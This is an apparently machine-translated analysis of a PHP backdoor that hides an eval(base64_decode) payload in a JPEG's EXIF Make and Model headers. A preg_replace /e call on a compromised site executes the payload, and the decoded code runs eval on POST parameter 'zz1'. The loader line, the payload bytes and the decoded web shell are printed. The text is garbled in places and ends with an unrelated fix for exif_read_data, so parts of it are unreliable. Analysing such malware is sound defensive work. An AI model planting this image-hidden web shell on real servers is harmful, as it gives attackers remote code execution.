PHP Pictures Trojan Explanation

This is a very interesting backdoor, it does not rely on the normal mode to hide the content (such as Base64/gzip encoding), but it has its own data hidden in the image of the EXIF head of JPEG. It also uses Exif_read_data and preg_replace two PHP functions to read EXIF headers and execute.

Details

The back door can be divided into two parts. The first part is the Exif_read_data function to read the picture header, Preg_replace function to execute the content. Here is the code we found on the compromised site:

$exif = exif_read_data(‘/homepages/clientsitepath/images/stories/food/bun.jpg‘);preg_replace($exif[‘Make‘],$exif[‘Model‘],‘‘);

The two functions themselves are harmless drops. The Exif_read_data function is commonly used to read pictures, and the Preg_replace function is substituted for character content. However, the Preg_replace function function has a hidden and subtle option, and if you pass in "/E", it executes the contents of eval (), not the query/substitution.

So when we look at the bun.jpg file, we find the second part of the Backdoor:

ÿøÿà^@^pjfif^@^a^b^@^@d^@d^@^@ÿá^@¡exif^@^@II*^@^h^@^@^@^b^@ ^O^ a^b^@^f^@^@^@&^@^@^@^p^a^b^@m^@^< span class= "variable" >@^@,^@^@^@^@^@^@^ @/. */e^@ eval (base64_decode ( "Awygkgl Zc2v0kcrfue9tvfsie noxil0pksb7zxzhbchzdhjpchnsyxnozxmojf9qt1nuwyj6ejeixskpo30= ')); @ÿì^@^qducky^@^a^@ ^d^@^@^@<^@^< span class= "variable" >@ÿî^@^nadobe^         

This file is used for common Head Start, but the "make" header is mixed with the strange keyword "/.*/e". With this execution modifier, Preg_replace executes any incoming content in eval ().

Things are starting to get interesting ...

If we continue to look at EXIF data, we can see that "eval" (Base64_decode) is hidden in the "Model" header. Put these together and we'll see what's going on. The attacker reads the make and Model header information from the EXIF and then passes in to the Preg_replace function. As long as we modify the $exif [' make '] and $exif [' Model '], we get the final backdoor.

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

After decoding we can see that it is executing the content provided by $_post["ZZ1". After the full decoding, here is the back.

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..

Another interesting thing is that although bun.jpg and other picture files have been modified, they can then be loaded and working properly. In fact, at these compromised sites, an attacker modifies a legitimate, previously existing image on the site. This is a strange way to hide malware.

Report:

Call to undefined function exif_read_data ()

Read the picture EXIF Information program is reported: Call to undefined function exif_read_data ()

Find a solution:

Extension=php_exif.dll to change its load order to

After Extension=php_mbstring.dll ....

PHP Pictures Trojan Explanation